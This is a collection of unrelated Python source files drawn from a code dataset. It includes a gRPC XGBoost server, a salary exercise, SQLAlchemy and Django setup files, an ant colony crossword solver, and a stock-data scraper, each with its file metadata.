remote_pb2.Integer(value=ret, status=status)\n\n except:\n status = handle_exception()\n return remote_pb2.Integer(status=status)\n\n def rpc_XGDMatrixNumRow(self, request, context):\n \"\"\"\n Get number of rows in DMatrix\n \"\"\"\n try:\n ret = self._synchronize(remote_api.XGDMatrixNumRow, request)\n status = remote_pb2.Status(status=0)\n return remote_pb2.Integer(value=ret, status=status)\n\n except:\n status = handle_exception()\n return remote_pb2.Integer(status=status)\n\ndef serve(enclave, num_workers=10, all_users=[]):\n condition = threading.Condition()\n command = Command()\n globals()[\"all_users\"] = all_users\n\n rpc_server = grpc.server(futures.ThreadPoolExecutor(max_workers=num_workers))\n remote_pb2_grpc.add_RemoteServicer_to_server(RemoteServicer(enclave, condition, command), rpc_server)\n rpc_server.add_insecure_port('[::]:50051')\n rpc_server.start()\n rpc_server.wait_for_termination()\n\n","sub_path":"python-package/securexgboost/remote_server.py","file_name":"remote_server.py","file_ext":"py","file_size_in_byte":12149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"25001888","text":"'''\n As Organizações Tabajara resolveram dar um aumento de salário aos seus colaboradores e lhe contrataram para\ndesenvolver o programa que calculará os reajustes.Faça um programa que recebe o salário de um colaborador e o \nreajuste segundo o seguinte critério, baseado no salário atual: \n\n• salários até R$ 280,00 (incluindo): aumento de 20%;\n• salários entre R$ 280,00 e R$ 700,00 (não incluído): aumento de 15%;\n• salários entre R$ 700,00 e R$ 1500,00 (não incluído): aumento de 10%;\n• salários de R$ 1500,00 em diante : aumento de 5%;\n\nApós o aumento ser realizado, informe na tela: \n• O salário antes do reajuste;\n• O percentual de aumento aplicado;\n• O valor do aumento;\n• O novo salário, após o aumento como descrito abaixo (uma saida por linha).\n\nEX.\nSalario anterior:750.00\nPercentual de aumento:10.00%\nNovo salario:825.00\n'''\n\n# Entrada de Salario\nsalario = float(input(\"\"))\naumento = 0\nprint(\"Salario anterior:{0:.2f}\".format(salario))\n\n# Tipo de Aumento\nif salario <= 280:\n aumento = float((salario * 20)/100)\n print(\"Percentual de aumento:20.00%\")\nif salario > 280 and salario < 700:\n aumento = float((salario * 15)/100)\n print(\"Percentual de aumento:15.00%\")\nif salario > 700 and salario < 1500:\n aumento = float((salario * 10)/100)\n print(\"Percentual de aumento:10.00%\")\nif salario > 1500:\n aumento = float((salario * 5)/100)\n print(\"Percentual de aumento:5.00%\")\n\n# Novo Salario\nprint(\"Novo salario:{0:.2f}\".format(aumento + salario))","sub_path":"Python/Lista2_Python/exercicio1_lista2_Python.py","file_name":"exercicio1_lista2_Python.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"491532874","text":"from sqlalchemy import Table, Column, ForeignKey, Integer, String, MetaData, create_engine\nimport tools.prefix as pfx\nfrom tools import configuration\nimport os\n\n#Base = declarative_base()\n\"\"\"\nclass Group(Base):\n __tablename__ = \"group\"\n id = Column(Integer, primary_key=True)\n name = Column(String(250), nullable=False)\n\nclass Account(Base):\n __tablename__ = \"account\"\n id = Column(Integer, primary_key=True)\n name = Column(String(250), nullable=False)\n encrypted = Column(String(500), nullable=False)\n group_id = Column(Integer, ForeignKey(\"group.id\"))\n\n\"\"\"\ndef log(note):\n print(pfx.NOTE + note, end=\" \")\n\ndef log_OK():\n print(\"OK\")\n\ndef log_FAIL():\n print(\"FAILED\")\n\ndef make_group(meta):\n # Same comment as the make_account function\n Table(\"group\", meta,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String)\n )\n\n #return group ## Dont need \n\ndef make_account(meta):\n # Can assign this to a variable and return it\n # Dont need it just yet\n Table(\"account\", meta,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String),\n Column(\"encrypted\", String),\n Column(\"group_id\", Integer, ForeignKey(\"group.id\"))\n )\n\n # return account ## Doesnt seem like I need this just yet\n\ndef create():\n data = configuration.load_data()\n log(\"Reading data from CONFIG.JSON:\")\n if data is not False:\n log_OK()\n log(\"Creating database engine:\")\n\n file_name = data[\"database\"][\"database_name\"]\n absolute_path = os.path.abspath(os.path.join(__file__, \"../\"))\n database_name = f\"sqlite:///{absolute_path}/{file_name}\" # Using three /'s because the fourth is added with the absolute file\n engine = create_engine(database_name, echo=False)\n\n log_OK()\n log(\"Creating database metadata:\")\n meta = MetaData()\n log_OK()\n\n make_group(meta)\n make_account(meta)\n\n log(\"Creating database:\")\n meta.create_all(engine)\n log_OK()\n \n print(pfx.SUCCESS + \"Finished creating the database!\")\n else:\n log_FAIL()\n print(pfx.WARNING + \"Could not load data from config.json\")","sub_path":"storage/sqlalchemy_delcare.py","file_name":"sqlalchemy_delcare.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"58331981","text":"from django.urls import path\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom django.contrib.auth.decorators import login_required\n\nfrom Pandas.views import PracticaUnoAPIView,javascript, SaludoView\n\napp_name='panda'\n\n\nurlpatterns = [\n\n #javascript\n path('javascript', \n javascript, \n name='js'),\n\n #LOGIN\n path('login', \n TemplateView.as_view(template_name='login.html'), \n name='login'),\n #LOGOUT\n path('logout', \n LogoutView.as_view(next_page=\"/\"), \n name=\"logout\"),\n\n\n #AQUI CARGA LAS ACCIONES AJAX\n\n\n path('', \n \n TemplateView.as_view(template_name=\"base/base.html\"), \n name=\"index\"),\n\n path('home',\n \n TemplateView.as_view(template_name=\"home.html\"), \n name=\"home\"),\n\n #AGRUPACIÓN API\n path('api/v1/agrupacion', \n PracticaUnoAPIView.as_view(), \n name=\"agrupacion-api\"),\n \n #AGRUPACION VIEW\n path('agrupacion-view', \n TemplateView.as_view(\n template_name='practica1/table_one.html'), \n name='agrupacion-view'),\n\n\n #===== AUTHENTICATED VIEWS =====#\n\n path('hello/', SaludoView.as_view(), name=\"hello-api\"),\n\n\n]\n","sub_path":"Pandas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"270563292","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Software : loop_server\n# @File : mftp_process.py\n# @Author : zaniu (Zzaniu@126.com)\n# @Date : 2018/12/12 20:05\n# @Description :\nimport os\nimport time\nimport re\nimport datetime\nimport traceback\nfrom multiprocessing import Process\nfrom threading import Thread\n\nfrom conf import settings\nfrom utils import log,mail\nfrom manifest.mf_analyze import ReceiptHandler\n\nlogger = log.getlogger(__name__)\n\n\nclass MFTPProcess(Process):\n def __init__(self):\n super().__init__()\n self.name = \"FTP进程-{}\".format(datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\"))\n\n def run(self):\n if settings.FTP_TASK:\n self.analyze_receipt_upload_to_mdn()\n\n def analyze_receipt_upload_to_mdn(self):\n \"\"\"分析回执,生成回执上传到mdn文件夹\"\"\"\n t = Thread(target=self.thread_analyze_receipt_upload_to_mdn)\n t.start()\n\n def thread_analyze_receipt_upload_to_mdn(self):\n \"\"\"分析回执,生成回执上传到mdn文件夹的线程\"\"\"\n while 1:\n try:\n logger.info('ftp analyze upload start')\n self.task_analyze_receipt_upload_to_mdn()\n logger.info('ftp analyze upload end')\n time.sleep(settings.LOOP_TIME)\n except Exception as e:\n logger.exception(e)\n mail.send_email(text=str(traceback.format_exc()),subject=\"分析-生成-上传回执线程异常,请火速前往处理\")\n logger.warn(\"分析-生成-上传回执线程异常,以邮件通知\")\n time.sleep(settings.EXCEPTION_WAIT_TIME)\n\n def task_analyze_receipt_upload_to_mdn(self):\n \"\"\"分析回执,更新数据库状态\"\"\"\n client_tmp_files = os.listdir(settings.RECEIPT_INOBX_MF)\n logger.info(\"需要处理的文件个数:{}\".format(len(client_tmp_files)))\n client_tmp_files = self.handle_files_order(client_tmp_files)\n if len(client_tmp_files) > 0:\n for name in client_tmp_files:\n file_path = os.path.join(settings.RECEIPT_INOBX_MF, name)\n handler = ReceiptHandler(file_path)\n handler.exec()\n logger.info(\"分析回执,生成回执上传完成\")\n\n def handle_files_order(self,files):\n \"\"\"将回执按照生成时间dDate排序,需要打开文件获取内容\"\"\"\n receipt_files = []\n other_files = []\n for file_name in files:\n if \"Receipt\" in file_name:\n receipt_files.append(file_name)\n else:\n other_files.append(file_name)\n receipt_files_dict = {}\n for file_name in receipt_files:\n file_path = os.path.join(settings.RECEIPT_INOBX_MF, file_name)\n with open(file_path, encoding=\"utf-8\") as f:\n content = f.read()\n ret = re.search(r\"(.*?)\", content) # 将回执排序\n if ret:\n receipt_files_dict[file_path] = datetime.datetime.strptime(ret.group(1), \"%Y%m%d%H%M%S%f\")\n s = sorted(receipt_files_dict.items(), key=lambda x: x[1])\n b = [i[0] for i in s]\n return other_files+b\n\n\nif __name__ == \"__main__\":\n DFTPProcess().start()\n","sub_path":"manifest/mftp_process.py","file_name":"mftp_process.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"56540568","text":"from django.urls import path\nfrom . import views\n\napp_name = 'notes'\n\nurlpatterns = [\n path('', views.NotesTemplateView.as_view(), name='notes'),\n path('/', views.NotesListView.as_view(), name='notes_by_type'),\n path('create///', views.NoteCreateView.as_view(), name='note_create'),\n]","sub_path":"ingredient_order_site/notes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"215833084","text":"from setuptools import setup\nfrom setuptools import find_packages\n\nlong_description = \"\"\"\nSatellite Preprocessing library for BaseMap1\n\"\"\"\n\nNAME = 'SatZoomer'\n\nrequires = ['numpy>=1.9.1',\n 'scikit-image',\n 'pandas']\n\nclassifiers = ['Development Status :: 2 - Pre-Alpha',\n 'License :: Other/Proprietary License',\n 'Programming Language :: Python :: 3',\n 'Operating System :: Microsoft :: Windows',\n 'Topic :: Scientific/Engineering :: Visualization']\n\nsetup(name=NAME,\n version='1.0.0',\n description='Satellite Image Processing',\n long_description=long_description,\n author='Jacob Rainbow',\n author_email='jacob.rainbow@os.uk',\n url='https://github.com/JRainbowOS/satzoomer',\n install_requires=requires,\n python_requires='>3.6',\n classifiers=classifiers,\n packages=find_packages()\n )\n\n# Needs Python 3.6 due to format strings. This library does not support Python 2.7.","sub_path":"pypi_install_script/SatZoomer-1.0.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"175367796","text":"import pandas as pd\nimport pickle\n\n\ndef memoize(f):\n memo = {}\n\n def helper(*args, **kwargs):\n\n if args[0] not in memo:\n memo[args[0]] = pickle.dumps(f(*args, **kwargs))\n return pickle.loads(memo[args[0]])\n return helper\n\n\n@memoize\ndef open_calibration(file_path: str, pair_mode=False):\n with open(file_path) as f:\n cc = pd.Series([\n float(v) for v in f.read().splitlines()\n ])\n\n if not pair_mode:\n return cc\n\n cc_odd = cc.copy()\n cc.index *= 2\n cc_odd.index = cc.index+1\n return pd.concat((cc, cc_odd))\n","sub_path":"calibration/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"218190409","text":"'''\nCreated on 12 apr. 2018\n\n@author: Sara Boanca\n'''\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom random import randint, random, shuffle, choice\nfrom copy import deepcopy\n\nclass Problem:\n def __init__(self, fileName, fileNameWords, fileNameParameters):\n self.__fileName = fileName\n items = []\n items = self.readFromFile(self.__fileName)\n self.__lines = items[0]\n self.__columns = items[1]\n self.__blanks = items[2]\n self.__matrix = items[3]\n self.__slots = items[4]\n words = []\n words = self.readFromFileWords(fileNameWords)\n self.__words = words\n parameters = self.readFromFileParameters(fileNameParameters)\n self.__noEpoch = parameters[0]\n self.__noAnts = parameters[1]\n self.__alpha = parameters[2]\n self.__beta = parameters[3]\n self.__rho = parameters[4]\n self.__q0 = parameters[5]\n \n def getNoEpoch(self):\n return self.__noEpoch\n \n def getNoAnts(self):\n return self.__noAnts\n \n def getAlpha(self):\n return self.__alpha\n \n def getBeta(self):\n return self.__beta\n \n def getRho(self):\n return self.__rho\n \n def getQ0(self):\n return self.__q0\n \n def getLines(self):\n return self.__lines\n \n def getColumns(self):\n return self.__columns\n \n def getBlanks(self):\n return self.__blanks\n \n def getMatrix(self):\n return self.__matrix\n \n def getSlots(self):\n return self.__slots\n \n def getWords(self):\n return self.__words\n \n def getIndividualSize(self):\n return len(self.__slots)\n \n def stringMatrix(self):\n matrix = self.__matrix\n s = ''\n for i in range(self.__lines):\n for j in range(self.__columns):\n m = matrix[i][j]\n s += str(m)\n s += ' '\n s += \"\\n\"\n return s\n \n def readFromFileParameters(self, fileNameParameters):\n parameters = []\n try:\n fd = open(fileNameParameters, 'r')\n noEpoch = int(fd.readline())\n parameters.append(noEpoch)\n noAnts = int(fd.readline())\n parameters.append(noAnts)\n alpha = float(fd.readline())\n parameters.append(alpha)\n beta = float(fd.readline())\n parameters.append(beta)\n rho = float(fd.readline())\n parameters.append(rho)\n q0 = float(fd.readline())\n parameters.append(q0)\n except IOError:\n print(\"error\")\n \n return parameters\n \n \n def readFromFileWords(self, fileName):\n words = []\n try:\n fd = open(fileName, 'r')\n words = fd.readline().split(',')\n except IOError:\n print(\"error\")\n return words\n \n def readFromFile(self, fileName):\n try:\n fd = open(fileName, 'r')\n lin = int(fd.readline())\n col = int(fd.readline())\n blanks = int(fd.readline())\n myMatrix = [[0 for x in range(lin)] for y in range(col)]\n for line in fd:\n (k, v) = line.split(' ')\n i1 = int(k)\n i2 = int(v)\n myMatrix[i1][i2] = '#'\n \n except IOError:\n print(\"error\")\n \n list=[]\n coloana = 0\n i = 0\n nrCrt = 0\n while i < lin:\n while myMatrix[i][coloana] == '#':\n coloana += 1\n if coloana == col:\n i += 1\n coloana = 0\n retCol = coloana\n length = 0\n while coloana < col and myMatrix[i][coloana] != '#':\n length += 1\n coloana += 1\n if length > 1:\n myTuple = [nrCrt, 0, i, retCol, length]\n nrCrt += 1\n list.append(myTuple)\n if coloana == col:\n i += 1\n coloana = 0\n \n linie = 0\n j = 0\n while j < col:\n while myMatrix[linie][j] == '#':\n linie += 1\n if linie == lin:\n j += 1\n linie = 0\n retLin = linie\n length = 0\n while linie < lin and myMatrix[linie][j] != '#':\n length += 1\n linie += 1\n if length > 1:\n myTuple = [nrCrt, 1, retLin, j, length]\n nrCrt += 1\n list.append(myTuple)\n if linie == lin:\n j += 1\n linie = 0\n \n return [lin, col, blanks, myMatrix, list]\n\nclass Ant:\n def __init__(self, problem):\n self.problem = problem\n self.size = problem.getIndividualSize()\n self.path = [randint(0,self.size-1)]\n self.matrix = problem.getMatrix()\n self.slots = problem.getSlots()\n self.words = problem.getWords()\n self.lines = problem.getLines()\n self.columns = problem.getColumns()\n \n def getSize(self):\n return self.size\n \n def getPath(self):\n return self.path\n \n def getNextIndex(self):\n return len(self.path)\n \n def fillCrossword(self):\n position = self.getNextIndex()\n matrix = deepcopy(self.matrix)\n words = self.words\n for i in range(position):\n slotNumber = self.path[i]\n slot = self.slots[slotNumber]\n if slot[1] == 0:\n x = slot[2]\n y = slot[3] - 1\n length = 0\n allowed = True\n while y < self.columns:\n y += 1\n while length < len(words[i]) and allowed == True:\n if matrix[x][y] == 0:\n matrix[x][y] = words[i][length]\n y += 1\n length += 1\n elif matrix[x][y] == \"#\":\n allowed = False\n break\n else:\n if words[i][length] != matrix[x][y]:\n matrix[x][y] = words[i][length]\n y += 1\n length += 1\n else:\n matrix[x][y] = words[i][length]\n y += 1\n length += 1 \n if y == self.columns and length < len(words[i]):\n allowed = False\n break\n else:\n y = slot[3]\n x = slot[2] - 1\n length = 0\n allowed = True\n while x < self.lines:\n x += 1\n while length < len(words[i]) and allowed == True:\n if matrix[x][y] == 0:\n matrix[x][y] = words[i][length]\n x += 1\n length += 1 \n elif matrix[x][y] == \"#\":\n allowed = False\n break\n else:\n if words[i][length] != matrix[x][y]:\n matrix[x][y] = words[i][length]\n x += 1\n length += 1 \n else:\n matrix[x][y] = words[i][length]\n x += 1\n length += 1 \n if x == self.lines and length < len(words[i]):\n allowed = False\n break\n return matrix\n \n def remainingSlots(self):\n remaining = []\n remainingSlots = []\n for i in range(self.size):\n if i not in self.path:\n remaining.append(i)\n for slot in self.slots:\n if slot[0] in remaining:\n remainingSlots.append(slot)\n return remainingSlots\n \n def filterSlotsByLength(self, length):\n slots = self.remainingSlots()\n filtered = []\n for slot in slots:\n if slot[4] == length:\n filtered.append(slot)\n return filtered\n \n def nextWordIndex(self, a):\n for i in range(len(self.path)):\n if self.path[i] == a:\n return i + 1 \n \n def nextMoves(self):\n words = self.words\n nextPossibleMoves = []\n remainingSlots = []\n remainingSlots = self.remainingSlots()\n index = self.getNextIndex()\n if index >= self.size:\n return []\n length = len(self.words[index])\n goodLengthSlots = self.filterSlotsByLength(length)\n if goodLengthSlots == []:\n return goodLengthSlots\n else:\n for slot in goodLengthSlots:\n matrix = self.fillCrossword()\n accepted = True\n if slot[1] == 0:\n x = slot[2]\n y = slot[3] - 1\n leng = 0\n allowed = True\n while y < self.columns:\n y += 1\n while leng < len(words[index]) and allowed == True:\n if matrix[x][y] == 0:\n matrix[x][y] = words[index][leng]\n y += 1\n leng += 1\n else:\n if words[index][leng] != matrix[x][y]:\n allowed = False\n accepted = False\n break\n else:\n matrix[x][y] = words[index][leng]\n y += 1\n leng += 1\n else:\n y = slot[3]\n x = slot[2] - 1\n leng = 0\n allowed = True\n while x < self.lines:\n x += 1\n while leng < len(words[index]) and allowed == True:\n if matrix[x][y] == 0:\n matrix[x][y] = words[index][leng]\n x += 1\n leng += 1 \n else:\n if words[index][leng] != matrix[x][y]:\n x += 1\n leng += 1 \n accepted = False\n allowed = False\n break \n else:\n matrix[x][y] = words[index][leng]\n x += 1\n leng += 1 \n if accepted == True:\n nextPossibleMoves.append(slot[0])\n \n return nextPossibleMoves \n \n def fitness(self):\n return (self.size - len(self.path) + 1)\n \n def calculateDistance(self, next):\n ant = Ant(self.problem)\n ant.path = self.path.copy()\n ant.path.append(next)\n rest = self.size - len(ant.path) + 1\n return (rest - len(ant.nextMoves()))\n \n def addMove(self, traceMatrix, alpha, beta, q0):\n p = [0 for i in range(self.size)]\n nextMoves=self.nextMoves()\n if len(nextMoves) == 0:\n return False\n for i in nextMoves:\n p[i] = self.calculateDistance(i)\n r =[(p[i]**beta)*(traceMatrix[self.path[-1]][i]**alpha) for i in range(len(p))]\n rnd1 = random()\n if rnd1 < q0:\n r = [[i, p[i]] for i in range(len(p))]\n r = max(r, key=lambda a: a[1])\n self.path.append(r[0])\n else:\n s = sum(p)\n if s == 0:\n return choice(nextMoves)\n p = [p[i] / s for i in range(len(p))]\n p = [sum(p[0 : i + 1]) for i in range(len(p))]\n rnd2 = random()\n i = 0\n while rnd2 > p[i]:\n i += 1\n self.path.append(i)\n return True \n \n \nclass Controller:\n def __init__(self, problem):\n self.problem = problem;\n self.size = problem.getIndividualSize()\n self.noEpoch = problem.getNoEpoch()\n self.noAnts = problem.getNoAnts()\n self.alpha = problem.getAlpha()\n self.beta = problem.getBeta()\n self.rho = problem.getRho()\n self.q0 = problem.getQ0()\n \n def getSize(self):\n return self.size\n \n def getNoEpoch(self):\n return self.noEpoch\n \n def getNoAnts(self):\n return self.noAnts\n \n def getAlpha(self):\n return self.alpha\n \n def getBeta(self):\n return self.beta\n \n def getRho(self):\n return self.rho\n \n def getQ0(self):\n return self.q0\n \n \n def epoch(self, problem, trace):\n noAnts = problem.getNoAnts()\n size = problem.getIndividualSize()\n alpha = problem.getAlpha()\n beta = problem.getBeta()\n rho = problem.getRho()\n q0 = problem.getQ0()\n \n population = []\n for i in range(noAnts):\n ant = Ant(problem)\n population.append(ant)\n for i in range(size):\n for ant in population:\n ant.addMove(trace, alpha, beta, q0)\n t = [1.0 / population[i].fitness() for i in range(len(population))]\n for i in range(size):\n for j in range(size):\n trace[i][j] = (1 - rho) * trace[i][j]\n for i in range(len(population)):\n for j in range(len(population[i].path) - 1):\n x = population[i].path[j]\n y = population[i].path[j + 1]\n trace[x][y] = trace[x][y] + t[i]\n fitness = [[population[i].fitness(), i] for i in range(len(population))]\n fitness = min(fitness)\n return population[fitness[1]].path\n \n \ndef main():\n problem = Problem(\"data01.in\", \"data02.in\", \"param01.in\")\n controller = Controller(problem);\n size = controller.getSize()\n noEpoch = controller.getNoEpoch()\n noAnts = controller.getNoAnts()\n alpha = controller.getAlpha()\n beta = controller.getBeta()\n rho = controller.getRho()\n q0 = controller.getQ0()\n solution = []\n bestSolution = []\n pheromoneMatrix = [[1 for i in range(size)] for j in range (size)]\n for i in range(noEpoch):\n solution = controller.epoch(problem, pheromoneMatrix)\n if len(solution)>len(bestSolution):\n bestSolution=solution.copy()\n fitness = problem.getIndividualSize() - len(bestSolution)\n print(\"fitness: \", fitness)\n print(\"solution: \", bestSolution)\n return fitness\n\nmain()","sub_path":"ACOCrossword/src/Crossword.py","file_name":"Crossword.py","file_ext":"py","file_size_in_byte":15460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"429683547","text":"import multiprocessing\nimport os\nfrom os.path import join, dirname, realpath\n\ncurrent_dir = realpath(dirname(dirname(__file__)))\n\nos.makedirs(join(current_dir, 'logs'), mode=0o700, exist_ok=True)\n\nbind = '127.0.0.1:9009'\nbacklog = 128\nworkers = multiprocessing.cpu_count() * 2 + 1\nworker_class = 'aiohttp.worker.GunicornWebWorker'\npidfile = join(current_dir, 'myfeed.pid')\naccesslog = join(current_dir, 'logs/gunicorn.log')\nerrorlog = join(current_dir, 'logs/gunicorn.log')\nloglevel = 'info'\napp_name = 'webapp:app'\naccess_log_format = '%a %l %u %t \"%r\" %s %b \"%{Referrer}i\" \"%{User-Agent}i\"'\ndaemon = True\n\n# Run this command to start gunicorn\n# $ gunicorn --config gunicorn_config.py webapp:app\n","sub_path":"myfeed/web/config/gunicorn_config.py","file_name":"gunicorn_config.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"129397287","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom resumecollection.resume.v1.views import CandidateProfileView\n\napp_name = \"resume\"\n\nrouter = DefaultRouter()\n\nrouter.register(r\"\", CandidateProfileView, basename=\"v1-resume\")\n\nurlpatterns = [\n path(\n \"/get_candidate_chain_references/\",\n CandidateProfileView.as_view({\"get\": \"get_candidate_chain_references\"}),\n ),\n path(\"\", include(router.urls)),\n]\n","sub_path":"resumecollection/resume/v1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"3818197","text":"from tests.v1.views import TCBase\n\n\nclass ExcelDownloadTCBase(TCBase):\n def _test(self, uri):\n \"\"\"\n - Test\n Download excel file with served uri\n * Validation\n (1) status code : 200\n (2) response data type : application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\n \"\"\"\n resp = self.request(\n self.client.get,\n uri,\n {},\n self.admin_access_token\n )\n\n # (1)\n self.assertEqual(resp.status_code, 200)\n\n # (2)\n self.assertEqual(resp.content_type, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n","sub_path":"Server/tests/v1/views/admin/apply/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"631966710","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport progressbar\nimport re\nfrom datetime import datetime\nimport pygsheets\n# set Google Sheets variables\nimport user_specific_variables\n\ndef scrape_finviz(symbols):\n\n # Get Column Header\n req = requests.get(\"https://finviz.com/quote.ashx?t=FB\")\n soup = BeautifulSoup(req.content, 'html.parser')\n table = soup.find_all(lambda tag: tag.name == 'table')\n rows = table[8].findAll(lambda tag: tag.name == 'tr')\n out = []\n for i in range(len(rows)):\n td = rows[i].find_all('td')\n out = out + [x.text for x in td]\n\n # Adding actual headers: Ticker, Sector, Sub-sector and country plus all from the finviz table\n # and then 5 from GuruFocus\n guru_ls = ['Piotroski F-Score', 'Altman Z-Score', 'Beneish M-Score']\n ls = ['Ticker', 'Sector', 'Sub-Sector', 'Country'] + out[::2] + guru_ls + ['ROIC', 'WACC']\n\n dict_ls = {k: ls[k] for k in range(len(ls))}\n df = pd.DataFrame()\n p = progressbar.ProgressBar()\n p.start()\n for j in range(len(symbols)):\n p.update(j / len(symbols) * 100)\n\n # Initialize FinViz parsing\n req = requests.get(\"https://finviz.com/quote.ashx?t=\" + symbols[j])\n if req.status_code != 200:\n continue\n soup = BeautifulSoup(req.content, 'html.parser')\n table = soup.find_all(lambda tag: tag.name == 'table')\n\n # Initialize GuruFocus table parsing (3 values for all the symbols)\n if (symbols[j].find('-')):\n guru_symbol = symbols[j].replace('-', '.')\n guru_req = requests.get(\"https://www.gurufocus.com/stock/\" + guru_symbol)\n if guru_req.status_code != 200:\n continue\n guru_soup = BeautifulSoup(guru_req.content, 'html.parser')\n\n # Process tables from BS\n rows = table[6].findAll(lambda tag: tag.name == 'tr')\n sector = []\n for i in range(len(rows)):\n td = rows[i].find_all('td')\n sector = sector + [x.text for x in td]\n sector = sector[2].split('|')\n rows = table[8].findAll(lambda tag: tag.name == 'tr')\n out = []\n for i in range(len(rows)):\n td = rows[i].find_all('td')\n out = out + [x.text for x in td]\n out = [symbols[j]] + sector + out[1::2]\n\n out_df = pd.DataFrame(out).transpose()\n df = df.append(out_df, ignore_index=True)\n\n scores = []\n\n for val in guru_ls[0:]:\n try:\n scores.append(guru_soup.find('a', string=re.compile(val)).find_next('td').text)\n except:\n scores.append('')\n\n try:\n roic_value = re.search(r'ROIC \\d+\\.\\d+', guru_soup.getText()).group(0)\n scores.append(roic_value.replace('ROIC ', ''))\n wacc_value = re.search(r'WACC \\d+\\.\\d+', guru_soup.getText()).group(0)\n scores.append(wacc_value.replace('WACC ', ''))\n except:\n scores.append('')\n scores.append('')\n\n df_len = len(df) - 1\n\n df.loc[df_len, guru_ls[0]] = scores[0]\n df.loc[df_len, guru_ls[1]] = scores[1]\n df.loc[df_len, guru_ls[2]] = scores[2]\n df.loc[df_len, ls[-2]] = scores[3]\n df.loc[df_len, ls[-1]] = scores[4]\n\n p.finish()\n df = df.rename(columns=dict_ls)\n\n gc = pygsheets.authorize(service_file=user_specific_variables.json_file)\n sheet = gc.open_by_key(user_specific_variables.sheet_key)\n\n worksheet = sheet.worksheet_by_title(user_specific_variables.worksheet_title)\n\n worksheet.clear(start='A1')\n worksheet.set_dataframe(df, start='A1', nan='')\n\n # Write output CSV from dataframe as a backup to local working directory as outputYYYY-MM-DD.csv\n output_file_with_date = 'output' + datetime.today().strftime('%Y-%m-%d') +'.csv'\n df.to_csv(output_file_with_date, index=False)\n\n return (df)\n\ndata = scrape_finviz(['msft', 'fb', 'aapl'])\n\n#data = scrape_finviz(['BKNG', 'REGN', 'ceo', 'SPGI', 'AAPL', 'FB', 'GOOGL', 'ISRG', 'INTC', 'ITW', 'MSFT', 'anss', 'ROP',\n# 'ACN', 'IPGP', 'bsm', 'GWW', 'CAT', 'mcd', 'SPR', 'MMM', 'LLY', 'csl', 'MNST', 'hon', 'TWTR',\n# 'NVDA', 'pep', 'JNJ', 'tdg', 'rost', 'IBM', 'BRK-A', 'ndsn', 'OSK', 'ABBV', 'ssw', 'CLX', 'leco',\n# 'POOL',\n# 'lanc', 'expd', 'epam', 'GRMN', 'bti', 'lulu', 'CINF', 'sne', 'chrw', 'DIS', 'NEE', 'PSX', 'apd',\n# 'mplx', 'ev', 'SHW', 'cb', 'EEFT', 'CVX', 'lin', 'PFE', 'MKC', 'PPG', 'AFL', 'ess', 'jag', 'DOV',\n# 'brc', 'WEN', 'chd', 'eca', 'EMR', 'bf-b', 'CMCSA', 'GD', 'cmg', 'CPRI', 'ori', 'TGT', 'wst',\n# 'AMZN', 'ED', 'PNR', 'ADP', 'WM', 'BEN', 'ECL', 'alb', 'tjx', 'BEAT', 'pii', 'ko', 'fast', 'utx',\n# 'cf',\n# 'FRT', 'WBA', 'FCX', 'CCL', 'jw-a', 'VFC', 'CAH', 'ato', 'EXPE', 'nav', 'HRL', 'nvt', 'skt', 'msa',\n# 'sjm', 'dci', 'WMT', 'ful', 'SYY', 'nfg', 'SWK', 'cdk', 'GPC', 'bpy', 'pbct', 'NNN', 'bkh', 'awr',\n# 'O', 'atr', 'son', 'LOW', 'LEG', 'XOM', 'byd', 'ABT', 'BA', 'abm', 'NUE', 'UAA', 'bll', 'BDX',\n# 'crm', 'sfix', 'PG', 'CL', 'ugi', 'cwt', 'wtr', 'njr', 'adm', 'MDT', 'ktb', 'mdp', 'mdu', 'tds',\n# 'QSR',\n# 'rpm', 'FLR', 'NKTR', 'KHC', 'CSX', 'NSC', 'AOS', 'KMB', 'appf', 'NRG', 'ipg', 'T', 'CC', 'anet',\n# 'CTAS', 'amcr', 'rtn', 'lmt', 'hii', 'lulu', 'NOC', 'oxy', 'cop', 'eog', 'pxd', 'cxo', 'bmi',\n# 'fele', 'hp', 'jkhy', 'mgee', 'mgrc', 'mo', 'nwn', 'ph', 'scl', 'sjw', 'syk', 'tnc', 'tr', 